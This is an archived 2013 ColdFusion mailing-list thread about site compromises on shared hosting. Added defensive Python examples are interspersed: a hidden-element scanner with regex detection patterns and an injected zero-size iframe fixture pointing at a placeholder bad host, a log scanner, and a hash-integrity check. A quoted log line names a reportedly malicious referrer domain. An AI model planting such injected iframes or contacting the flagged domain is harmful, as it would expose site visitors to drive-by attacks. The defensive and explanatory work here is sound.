RE: New Round of Exploits going on
Why not just get your own server.

-----Original Message-----
From: Russ Michaels [mailto:r...@michaels.me.uk]
Sent: Tuesday, February 12, 2013 5:54 AM
To: cf-talk
Subject: Re: New Round of Exploits going on

> Byron,
>
> [Message quoted in full; it appears as its own post in this thread.]
>
> On Tue, Feb 12, 2013 at 6:37 AM, Byron Mann <byronos...@gmail.com> wrote:
>> [Message quoted in full; it appears as its own post in this thread.]
>>
>> Byron Mann
>> Lead Engineer Architect
>> HostMySite.com

~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354530
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
RE: New Round of Exploits going on
Maybe, money?

-----Original Message-----
From: Revolution [mailto:houseoffusion_...@internetemail.info]
Sent: Friday, February 15, 2013 7:56 AM
To: cf-talk
Subject: RE: New Round of Exploits going on

> Why not just get your own server.
>
> -----Original Message-----
> From: Russ Michaels [mailto:r...@michaels.me.uk]
> Sent: Tuesday, February 12, 2013 5:54 AM
> To: cf-talk
> Subject: Re: New Round of Exploits going on
>
>> Byron,
>>
>> [Message quoted in part; it appears as its own post in this thread.]

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354535
RE: New Round of Exploits going on
And skills, did you actually read the discussion?

Regards
Russ Michaels
www.michaels.me.uk
www.cfmldeveloper.com - Free CFML hosting for developers
www.cfsearch.com - CF search engine

On Feb 15, 2013 9:13 PM, "Stephens, Larry V" <steph...@iu.edu> wrote:
> Maybe, money?
>
> -----Original Message-----
> From: Revolution [mailto:houseoffusion_...@internetemail.info]
> Sent: Friday, February 15, 2013 7:56 AM
> To: cf-talk
> Subject: RE: New Round of Exploits going on
>
>> Why not just get your own server.
>>
>> -----Original Message-----
>> From: Russ Michaels [mailto:r...@michaels.me.uk]
>> Sent: Tuesday, February 12, 2013 5:54 AM
>> To: cf-talk
>> Subject: Re: New Round of Exploits going on
>>
>>> Byron,
>>>
>>> [Message quoted in part; it appears as its own post in this thread.]

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354537
Re: New Round of Exploits going on
Byron,

That is partly true, if you make certain assumptions, but things are not quite that simple, considering the following.

Let's say you get your own server to host your own site. And that is it: you do not do any kind of lockdown, do not keep your patches and hotfixes up to date, do no monitoring whatsoever. Then yes, in such a scenario the shared server will be safer in general, because your server as a whole is not secure, so a vulnerability on the server is more likely. So getting a server with no idea what you're doing and no management or support would be pretty dumb. If you do not have the skills to manage it yourself and make sure it is secure, then you should be paying your host or someone else to do this for you.

However, if you are running a server with *ONLY* your own site on it, your chances of being attacked in the first place are much less than on a shared server. Consider that a shared server is going to have *AT LEAST* 200 other sites on it, probably more, and attackers generally target a list of domains/websites rather than the server itself when looking for vulnerabilities, so that is a 20,000% increase in your chances of being hacked due to the other websites already on the server.

Let's also consider that your own site is written in CF, and so CF is the only thing you would have installed on your own server. So you only have one application-layer attack vector. But on a shared server you're also going to have ASP, .NET, Perl, PHP, Ruby and probably more, so that has just increased the possible attack vectors by at least another 500%.

On Tue, Feb 12, 2013 at 6:37 AM, Byron Mann <byronos...@gmail.com> wrote:
> (apologies for the length)
>
> [Message quoted in full; it appears as its own post in this thread.]
>
> Byron Mann
> Lead Engineer Architect
> HostMySite.com

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354474
Re: New Round of Exploits going on
Unfortunately, Andrew, things are never that simple. For every customer like yourself who wants this turned off, there will be 100 customers who want it turned on. Most people do not know about or care about the security side of hosting, and just want everything enabled, which makes their life easier. So as soon as they hear the word "disabled", their initial response will be things like:

1) Our previous host did not do this
2) Then we will have to look for another host

Many hosts are, I'm sure, simply giving in to the demands of the majority of their customers and providing them with the services they want even though they are insecure. I regularly explain to customers/developers why cfexecute is disabled, why they do not have read/write access to the entire server, why createobject(java) is disabled by default, and in general why things have to be locked down on a shared server.

We do however stick to our main security policies, so our servers are more secure than most, but this of course comes at a cost, as many customers simply will not accept such restrictions and would rather go and find an insecure host instead.

At the end of the day, if you want security and control over your hosting environment the solution is simple: DO NOT USE SHARED HOSTING.

On Mon, Feb 11, 2013 at 5:32 AM, Andrew Scott <andr...@andyscott.id.au> wrote:
> One thing I hate about some hosting companies is that they have Robust Exceptions switched on, but what concerns me even more is that they don't care that this is a security risk...
>
> If your hosting company is one of them, get in their ears about having it switched off. If they refuse then it's time for a change.

--
Russ Michaels
www.bluethunderinternet.com : Business hosting services solutions
www.cfmldeveloper.com : ColdFusion developer community
www.michaels.me.uk : my blog
www.cfsearch.com : ColdFusion search engine
*skype me* : russmichaels

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354448
Re: New Round of Exploits going on
Yeah I guess, but that is why there are log files, so there is really no excuse.

But how cost efficient would it be to just move those people over to their own server so they can affect themselves? And I would bet that it is these people who also turn off UAC on Windows and get all types of infections, and could very well be the ones FTPing up infected files to begin with.

Russ, I hear you, but then maybe they are better off elsewhere if they can't understand the implications.

--
Regards,
Andrew Scott
WebSite: http://www.andyscott.id.au/
Google+: http://plus.google.com/113032480415921517411

On Mon, Feb 11, 2013 at 9:15 PM, Russ Michaels <r...@michaels.me.uk> wrote:
> Unfortunately, Andrew, things are never that simple.
>
> [Message quoted in full; it appears as its own post in this thread.]

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354449
Re: New Round of Exploits going on
Unfortunately no host can afford to tell all their customers "you're better off elsewhere". It would not be cost efficient at all to give a shared hosting customer their own server for the same price; they would lose money, I doubt the cost would even be remotely covered. Both of those solutions would put any host out of business very quickly.

On Mon, Feb 11, 2013 at 10:37 AM, Andrew Scott <andr...@andyscott.id.au> wrote:
> Yeah I guess, but that is why there are log files, so there is really no excuse.
>
> [Message quoted in full; it appears as its own post in this thread.]
>
> On Mon, Feb 11, 2013 at 9:15 PM, Russ Michaels <r...@michaels.me.uk> wrote:
>> Unfortunately, Andrew, things are never that simple.
>>
>> [Message quoted in full; it appears as its own post in this thread.]

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354450
Re: New Round of Exploits going on
Russ, I never meant their own server. I meant put all customers who want the robust onto the same server.

But I did raise an enhancement with Adobe, where my suggestion is to have robust exceptions off by default and not be able to enable or disable them from the CF admin. However, if the customer wants to exploit their own site then they have the option to turn that level of exception on in the Application.cfc.

On Tue, Feb 12, 2013 at 3:05 AM, Russ Michaels <r...@michaels.me.uk> wrote:
> Unfortunately no host can afford to tell all their customers "you're better off elsewhere".
>
> [Message quoted in full; it appears as its own post in this thread.]
>
> On Mon, Feb 11, 2013 at 10:37 AM, Andrew Scott <andr...@andyscott.id.au> wrote:
>> [Message quoted in full; it appears as its own post in this thread.]
>>
>> On Mon, Feb 11, 2013 at 9:15 PM, Russ Michaels <r...@michaels.me.uk> wrote:
>>> [Message quoted in full; it appears as its own post in this thread.]

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354452
Re: New Round of Exploits going on
I would not think that is a cost-effective solution either, as there is such a small number of customers who would request to be on a secure server. We offer something like that, called semi-dedicated, but it is more expensive.

If CF had a web admin like Railo, it would solve all those types of issues really.

On Mon, Feb 11, 2013 at 4:21 PM, Andrew Scott <andr...@andyscott.id.au> wrote:
> Russ, I never meant their own server. I meant put all customers who want the robust onto the same server.
>
> [Message quoted in full; it appears as its own post in this thread.]
>
> On Tue, Feb 12, 2013 at 3:05 AM, Russ Michaels <r...@michaels.me.uk> wrote:
>> [Message quoted in full; it appears as its own post in this thread.]
>>
>> On Mon, Feb 11, 2013 at 10:37 AM, Andrew Scott <andr...@andyscott.id.au> wrote:
>>> [Message quoted in full; it appears as its own post in this thread.]
>>>
>>> On Mon, Feb 11, 2013 at 9:15 PM, Russ Michaels <r...@michaels.me.uk> wrote:
>>>> [Message quoted in full; it appears as its own post in this thread.]

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354456
Re: New Round of Exploits going on
IF, and it's a large IF, but IF you're willing to maintain your own machine, then a Slicehost with an open source CFML engine isn't all that much more expensive than a shared hosting plan. For $20 USD a month you can have a Linode running whatever flavor of headless Linux that you want. Throw on Webmin/Virtualmin to handle site creation and updates. Throw on Railo on Tomcat. MySQL for DB, Apache to serve web traffic. Use iptables to lock down all but SSH/HTTP/HTTPS/FTP/DNS. Virtualmin can be set to automatically check for package updates and deploy them on a set schedule. It can back up to an S3 bucket. Railo can be set to update automatically as well. Everything that is running is basically free; it's just going to cost you in time if you're not familiar with it.

Now, the cost in time for setup? That's going to be higher than just going with a shared host, but I personally found that my time is far offset against dealing with the latest issues that have come up with vulnerabilities.

NOTE: this doesn't address PCI compliance, as I've not had to go down that route. In that instance shared may still yet be cheaper, but given the prices I've seen on shared hosts that are PCI compliant, I still think it'd be cheaper to roll your own. But then, I'm able to do the admin and dev side of things.

--
Matthew Williams
Geodesic GraFX
www.geodesicgrafx.com/blog
twitter.com/ophbalance

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354457
Re: New Round of Exploits going on
Les Mizzell wrote:
> So, anybody know what this is doing?
>
> Allaire Cold Fusion Template

Something similar came up on StackOverflow last week (possibly the same exploit). That guy said the old AB Positive Encrypt and Decrypt utility was able to decrypt the file:

http://www.adobe.com/cfusion/exchange/index.cfm?event=extensionDetail&extid=1007043

-Leigh

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354458
Re: New Round of Exploits going on
Well I guess the ticket I raised is too late. One can already do this:

<cfset this.enablerobustexception = true />

On Tue, Feb 12, 2013 at 3:53 AM, Leigh <cfsearch...@yahoo.com> wrote:
> Les Mizzell wrote:
>> So, anybody know what this is doing?
>>
>> Allaire Cold Fusion Template
>
> [Message quoted in full; it appears as its own post in this thread.]
>
> -Leigh

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354468
Re: New Round of Exploits going on
(apologies for the length)

Russ, I can tell by your comments that you either have dealt with a lot of hosts or have worked or owned one. Well said.

Having worked in the hosting space for more than 10 years now, I can safely say there is absolutely no 100% way to prevent these exploits on any platform. That is not to say there are not more secure options than shared hosting, but even at that you may need an above-average skill set.

I can make an argument that shared CF hosting is probably more secure for half the people using ColdFusion out there. How and why? Well, most probably have no one actively monitoring their servers. Not only do we have ourselves and tools looking at the servers, but our customers, who make us instantly aware of an issue. Even a subpar host probably has a better lockdown on CF than many non-host-managed CF users.

How many can say they don't have rootkits (or even know what that is) running on their server? Probably a lot on this list, but the average VPS, cloud or dedicated user out there, ummm, probably not.

Example: there was a recent issue we had with hidden elements being injected into files on a shared server. This was actually a customer running WordPress. How many out there would have found that, and how quickly, say on a dedicated server with a site that only gets updated once a month?

The best you can do is be vigilant, do your patching and homework, and when the next compromise comes, take it on the cheek, mitigate, and take what you learned and try to improve for the next go-around. And if you are a hosting customer, it's up to you to be aware and educated on what a host should and shouldn't be doing (aka this list). And then decide if it's time to move on or acceptable to you.

Of course I'm speaking in general terms, as this is the case with not only CF but all platforms. How many times a week do we hear about a Drupal or WordPress issue? Just about as often as CF, if not more.

Quick fact: we have more dedicated, VPS, cloud (VMs) revenue affected by compromises than our shared customers.

But let's not all forget the real problem here. It's not CF users', the host's or Adobe's fault. It's the dirt bags out there who make escalations happen that result in the 3 am phone calls.

Byron Mann
Lead Engineer Architect
HostMySite.com

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354470
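Byron's point about hidden elements injected into files, and how quickly anyone would notice on a rarely updated site, comes down to two defensive checks: a content baseline so changed files stand out, and a heuristic scan of changed files for the hidden-element shapes that injected content usually takes. The following is an added example, not code from the original post or from HostMySite; the two docroot snapshots are constructed in memory, `bad.example` is a placeholder host, and the regular expressions are heuristics, not a complete signature set.

```python
"""Two defensive checks for the situation Byron describes: a content baseline
so modified files stand out, and a heuristic scan for hidden elements of the
kind that get injected into HTML. Added example, not code from the original
post or from HostMySite; the file trees below are constructed in memory and
the patterns are heuristics, not a complete signature set."""
import hashlib
import re

# Heuristic patterns that often accompany injected content: zero-sized iframes,
# elements hidden via CSS or pushed off-screen, and scripts assembled from
# unescape()/fromCharCode chains. Tune to the site; they will not catch everything.
HIDDEN_PATTERNS = [
    re.compile(r'<iframe[^>]*(width|height)\s*=\s*["\']?0', re.I),
    re.compile(r'<(div|span|iframe)[^>]*style\s*=\s*["\'][^"\']*'
               r'(display\s*:\s*none|visibility\s*:\s*hidden|left\s*:\s*-\d{3,})', re.I),
    re.compile(r'<script[^>]*>[^<]*(document\.write\(\s*unescape|String\.fromCharCode)', re.I),
]


def sha256_text(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def build_baseline(files):
    """files: {path: content} captured at a known-good moment -> {path: sha256}."""
    return {path: sha256_text(content) for path, content in files.items()}


def changed_files(baseline, files):
    """Paths that are new or whose hash no longer matches the baseline, sorted."""
    return sorted(p for p, c in files.items() if baseline.get(p) != sha256_text(c))


def find_hidden_elements(content):
    """Snippets (first 80 chars of each match) that look like injected hidden elements."""
    return [m.group(0)[:80] for pat in HIDDEN_PATTERNS for m in pat.finditer(content)]


def audit(baseline, files):
    """Combine both signals: for every changed file, what in it looks injected.
    A changed file with an empty list is a change worth a human look but not
    obviously malicious; a non-empty list is the 'hidden element' case."""
    return {p: find_hidden_elements(files[p]) for p in changed_files(baseline, files)}


# Constructed docroot snapshots. bad.example is a placeholder host.
KNOWN_GOOD = {
    "index.html": "<html><body><h1>Welcome</h1><p>Hello</p></body></html>",
    "about.html": "<html><body><h1>About</h1></body></html>",
    "contact.html": "<html><body><h1>Contact</h1></body></html>",
}
CURRENT_TREE = {
    "index.html": "<html><body><h1>Welcome</h1><p>Hello</p>"
                  '<iframe src="http://bad.example/x.php" width="0" height="0"></iframe>'
                  "</body></html>",
    "about.html": "<html><body><h1>About us</h1></body></html>",  # legitimate edit
    "contact.html": "<html><body><h1>Contact</h1></body></html>",
}

if __name__ == "__main__":
    for path, findings in audit(build_baseline(KNOWN_GOOD), CURRENT_TREE).items():
        print(path, "->", findings or "changed, nothing hidden matched")
```

Run against a real docroot, the baseline would be written at deploy time and the audit scheduled far more often than the site is edited, which is exactly the gap on the once-a-month dedicated box Byron describes: the hash diff surfaces the change the same day, and the pattern scan says which changed files deserve a look first.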
New Round of Exploits going on
It appears that there are either Web Developers running sites with current infections, or there is a new round happening. I have seen one site hacked twice in the last two weeks, and although they were never able to run the code, there is very little evidence that this exploit is from the web site it was found on. However the one thing that I noticed in the logs at the time of the modified HTML file, and yes they only modified HTML files and not CFML files, was that I found a HEAD request in the logs that came from a website that looked suspicious. When I googled this domain my AntiVirus detected this as a Black Hole Security Exploit, but what was worrying was that this log with the domain had the website that was hacked in the log. And it looks like this with the details changed to protect both parties. 2013-02-06 01:43:48 xxx.xxx.xxx.xxx HEAD / - 80 - xxx.xxx.xxx.xxx Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:18.0)+Gecko/20100101+Firefox/18.0 http://somedomain/?info/d http://luhafaki.eg.vg/?info/andyscott.id.au omainattacked 301 0 0 225 432 125 Now you can see that this was redirected, but if there is a known exploit these guys are still able to do this. As was evident with the latest Anonymous attacks. I encourage people to look at their websites and check to see if they have been infected with this new wave. I have gone through the logs of the website in question and there is no evidence that it was infected directly through the website, except for that one line in the log mentioned above. What really shocks me even more, is that the hosting company refuse to acknowledge that they may be responsible, which is fair enough if this website did not have all the checks to sanitize all form inputs with Anti Sammy. And there is also no evidence that this a SQL Injected attack either, which is near impossible unless there is a known bug with hibernate and its current binding of variables. Aka cfqueryparam for hibernate. 
Anyway, as some people have mentioned that they have been attacked in the last few weeks, I wanted to share this as there seems to be a new exploit going around that may or may not be related to ColdFusion on shared hosts, but they seem to not care who they are infecting.

-- Regards, Andrew Scott
WebSite: http://www.andyscott.id.au/
Google+: http://plus.google.com/113032480415921517411

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354443
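An added example, not part of Andrew's post or any project's code, showing how a defender could scan IIS W3C extended logs for the pattern he describes: HEAD requests whose Referer comes from a domain on a watchlist. The log lines, IP addresses and the watchlisted domain below are constructed placeholders; the field list is the standard IIS W3C set that matches the columns in the quoted log line.

```python
from urllib.parse import urlsplit

# Added example (not from the thread): flag HEAD requests in IIS W3C logs whose
# Referer host is on a watchlist of known-bad domains. All values are constructed.

WATCHLIST = {"malicious-referrer.example"}   # placeholder; substitute your own indicators


def parse_w3c(lines):
    """Yield one dict per log entry, taking column names from the #Fields: directive."""
    fields = None
    for line in lines:
        line = line.rstrip("\n")
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue                       # other directives and blank lines
        elif fields:
            values = line.split(" ")
            if len(values) == len(fields):  # skip truncated or malformed lines
                yield dict(zip(fields, values))


def referer_host(entry):
    """Hostname from cs(Referer), or None when IIS logged '-' (no referrer sent)."""
    ref = entry.get("cs(Referer)", "-")
    return urlsplit(ref).hostname if ref != "-" else None


def suspicious_heads(lines, watchlist=WATCHLIST):
    """Return (date, time, client ip, referer host) for HEAD requests referred from a watchlisted host."""
    hits = []
    for entry in parse_w3c(lines):
        host = referer_host(entry)
        if entry.get("cs-method") == "HEAD" and host in watchlist:
            hits.append((entry["date"], entry["time"], entry["c-ip"], host))
    return hits


# Constructed sample log: one watchlisted HEAD, one ordinary GET, one HEAD with no referrer.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status sc-bytes cs-bytes time-taken
2013-02-06 01:43:48 192.0.2.10 HEAD / - 80 - 203.0.113.5 Mozilla/5.0+(Windows+NT+6.1;+WOW64) http://malicious-referrer.example/?info/victim.example 301 0 0 225 432 125
2013-02-06 01:44:02 192.0.2.10 GET /index.html - 80 - 198.51.100.7 Mozilla/5.0+(Windows+NT+6.1) http://www.google.com/ 200 0 0 1543 410 31
2013-02-06 01:45:10 192.0.2.10 HEAD / - 80 - 198.51.100.9 curl/7.29.0 - 200 0 0 0 90 4
""".splitlines()

if __name__ == "__main__":
    for hit in suspicious_heads(SAMPLE_LOG):
        print(hit)
```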
Re: New Round of Exploits going on
I just got the below on a site. Not sure how to decrypt it to tell exactly what it's doing though. Client noticed that Google had flagged the site as 'compromised'. I'm pointing my finger at the hosting company - they've got a security issue if this can happen, correct? So, anybody know what this is doing?

- Allaire Cold Fusion Template Header Size: New Version
Re: New Round of Exploits going on
One thing I hate about some hosting companies is that they have Robust Exceptions switched on, but what concerns me even more is that they don't care that this is a security risk... If your hosting company is one of them, get in their ears about having it switched off. If they refuse then it's time for a change.

Also, as a caution not a rule, if you're lucky enough to have the time, look into using any framework that supports MVC and SES rewrites; this has stopped them in their tracks as they are not able to run the uploaded code. Not with ease at least, anyway.

Still I am not sure how they are uploading these files, as there is nothing in the logs that indicates this. I am guessing that something else on the server is compromised, and because they are able to and do look for exceptions being displayed to the screen, they now know where to start spreading their malware. My guess is there is an exploit still known and not public that is bypassing all sandboxing at the moment.

-- Regards, Andrew Scott
WebSite: http://www.andyscott.id.au/
Google+: http://plus.google.com/113032480415921517411

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354445
Re: New Round of Exploits going on
Still I am not sure how they are uploading these files as there is nothing in the logs that indicates this.

For mine in the previous message, the altered file still had the ORIGINAL creation date on it - 2011 something - although it was altered last week. So, a search of all the site files for anything recently altered showed nothing.

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354446
Re: New Round of Exploits going on
That would indicate that they were able to get the file stamp before modifying it and reapplying the time stamp. Extreme long shot, but who knows how they are doing this.

-- Regards, Andrew Scott
WebSite: http://www.andyscott.id.au/
Google+: http://plus.google.com/113032480415921517411

On Mon, Feb 11, 2013 at 4:43 PM, Les Mizzell lesm...@bellsouth.net wrote:

Still I am not sure how they are uploading these files as there is nothing in the logs that indicates this.

For mine in the previous message, the altered file still had the ORIGINAL creation date on it - 2011 something - although it was altered last week. So, a search of all the site files for anything recently altered showed nothing.

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354447
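An added example, not from the thread, of the integrity check that would have caught Les's altered file despite its preserved timestamp: compare the web root against a content-hash baseline instead of searching by modification time, as Andrew's reply suggests the attackers reapply the original stamp. The temporary directory, file contents and dates below are constructed for the demonstration.

```python
import hashlib
import os
import tempfile
import time

# Added example (not from the thread): a content-hash baseline catches a modified
# page even when the attacker restores its original timestamp. Scenario is constructed.


def hash_tree(root):
    """Map each file's path (relative to root) to the SHA-256 hex digest of its content."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                digests[os.path.relpath(path, root)] = hashlib.sha256(fh.read()).hexdigest()
    return digests


def diff_baseline(baseline, current):
    """Return (changed, added, removed) relative paths between two hash snapshots."""
    changed = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    return changed, added, removed


def recently_modified(root, since):
    """The mtime-based search the poster ran: files whose mtime is later than 'since'."""
    return sorted(os.path.relpath(os.path.join(d, f), root)
                  for d, _dirs, files in os.walk(root) for f in files
                  if os.path.getmtime(os.path.join(d, f)) > since)


def demo():
    """Constructed scenario: a page is defaced and its original mtime is put back."""
    with tempfile.TemporaryDirectory() as root:
        page = os.path.join(root, "index.html")
        with open(page, "w") as fh:
            fh.write("<html><body>Hello</body></html>")
        old = time.time() - 2 * 365 * 86400        # pretend the file dates from two years ago
        os.utime(page, (old, old))
        baseline = hash_tree(root)                 # taken while the site is known-good
        scan_after = time.time() - 7 * 86400       # "anything altered in the last week"
        with open(page, "a") as fh:                # the defacement: markup appended
            fh.write("<!-- injected -->")
        os.utime(page, (old, old))                 # attacker restores the original timestamp
        by_mtime = recently_modified(root, scan_after)
        changed, added, removed = diff_baseline(baseline, hash_tree(root))
        return by_mtime, changed, added, removed


if __name__ == "__main__":
    print(demo())  # ([], ['index.html'], [], [])
```

The mtime search returns nothing, exactly as Les observed, while the hash comparison reports index.html as changed.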